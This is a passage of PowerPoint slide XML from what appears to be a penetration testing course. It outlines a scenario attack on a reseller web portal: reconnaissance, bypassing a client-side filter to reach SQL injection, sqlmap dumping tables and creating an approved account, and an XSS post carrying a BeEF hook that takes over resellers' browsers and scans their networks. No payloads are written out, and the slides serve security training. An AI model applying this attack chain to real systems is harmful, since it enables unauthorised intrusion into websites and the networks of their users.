          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will walk through a complete attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This scenario is based on real tests</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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scenario Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232350" y="1740110"/>
            <a:ext cx="8686800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A server manufacturer (HAL) is the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The penetration tester (Penelope) has been hired to verify the security of the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Since this is a reseller application, other companies may be part of the scope</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Public Internet Facing site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Links to Reseller site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reseller site requires authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sign-up system is available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sign-ups must be approved</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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Google Searches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Way to much information due to the target type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Infrastructure information was disclosed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information regarding resellers was also found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Nmap Port scans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP and HTTPS only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server Versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Current Apache install</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses WebScarab to spider the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Builds a sitemap</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reseller sign-up page is a key target within the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client side filtering of SQL injection code is being used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Easily bypassed to launch attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using an interception proxy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89707" y="1961446"/>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27654"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQLmap was used to dump the database tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Determine what fields need to be set to approve the account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Again using sqlmap Penelope inserts a record for her account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Allowing logins</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180227" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Log into the reseller site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Penelope now uses data from the site to further her recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Searches for reseller data</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181251" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Nmap Port scans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP and HTTPS only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server Versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Current Apache install</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses WebScarab to spider the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Builds a sitemap</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reseller site includes messaging features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Post a message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Containing XSS code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>View the post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Determine if it worked</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183299" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF exploitation is selected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Inject beefmagic.js.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Wait for resellers to get attacked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Control the zombies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Port scan the client networks</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184323"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64575"/>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84326"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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Next Steps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>What are the next steps?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As we finish this class, the next few items will help us continue to gain skills</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Three categories to continue:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Explore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Explain</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Practice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186371" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554635" y="1462396"/>
            <a:ext cx="7976015" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Practice makes perfect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Learn more by doing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Various methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Class DVD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Includes more than we covered in class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Vulnerable Test Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Various pre-built vulnerable applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A Lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Easier than we think</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pre-built Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669560" y="1628821"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>WebGoat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>OWASP application focused on training</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Contains various lessons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mutillidae</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IronGeek.com built a series of application for the OWASP Top 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Damn Vulnerable Web App (DVWA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://www.dvwa.co.uk/</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web Application Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338530" y="1740110"/>
            <a:ext cx="5867400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Easier than you think</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using virtualization we can save costs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use open source projects as targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Great way to help projects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="188420" name="Picture 5" descr="j03052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2057400"/>
            <a:ext cx="222885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685800" y="183630"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Injection Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="244834" y="1032666"/>
            <a:ext cx="4800600" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
